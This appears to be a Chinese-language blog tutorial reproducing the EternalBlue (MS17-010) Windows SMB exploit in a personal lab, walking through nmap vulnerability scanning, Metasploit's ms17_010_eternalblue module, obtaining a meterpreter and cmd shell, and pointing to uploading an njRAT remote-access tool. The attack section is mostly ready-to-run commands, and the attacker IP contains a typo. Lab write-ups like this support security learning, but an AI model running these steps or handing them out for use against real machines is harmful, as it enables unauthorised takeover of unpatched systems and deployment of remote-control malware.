永恒之蓝漏洞复现

一、永恒之蓝

什么是永恒之蓝

永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

二、实验环境

个人虚拟机

  • 攻击机:Kali Linux 2021 190.168.20.148
  • 靶机:Win7-x64 192.168.20.130(未打 MS17-010 补丁)

三、漏洞利用

1. 对靶机进行漏洞扫描,发现存在永恒之蓝漏洞

nmap --script smb-vuln-* 192.168.20.130

永恒之蓝漏洞复现_第1张图片

2. 进入 Kali 攻击机的 Metasploit 框架

msfcosole

永恒之蓝漏洞复现_第2张图片

 3. 查看 Metasploit 框架集成的有关 MS17-010 的模块 

search ms17-010

永恒之蓝漏洞复现_第3张图片

4. 验证靶机永恒之蓝漏洞是否存在

use auxiliary/scanner/smb/smb_ms17_010
show options
set rhosts 192.168.20.130
run

show options 查看配置,Required 列为 yes 的都需要配置

永恒之蓝漏洞复现_第4张图片

 发现靶机存在永恒之蓝漏洞可以利用

5. 利用攻击模块进行渗透

use exploit/windows/smb/ms17_010_eternalblue
show options
set rhosts 192.168.20.130

永恒之蓝漏洞复现_第5张图片

永恒之蓝漏洞复现_第6张图片成功连接靶机,获得 meterpreter shell

 6. 查看靶机系统信息,用户身份

help  # 查看帮助信息
sysinfo  # 查看系统信息
getuid  # 查看用户身份

永恒之蓝漏洞复现_第7张图片

7. 获得反弹的 cmd shell

shell

永恒之蓝漏洞复现_第8张图片

可以参考该文章上传远控文件:njRAT 简单使用案例_Myu_wzy的博客-CSDN博客

接下来的就自由发挥、自由练习了!

注:本文章仅作技术学习作用,一切实验皆在个人虚拟环境下进行!!!

你可能感兴趣的:(安全,漏洞复现,安全,信息安全,渗透测试)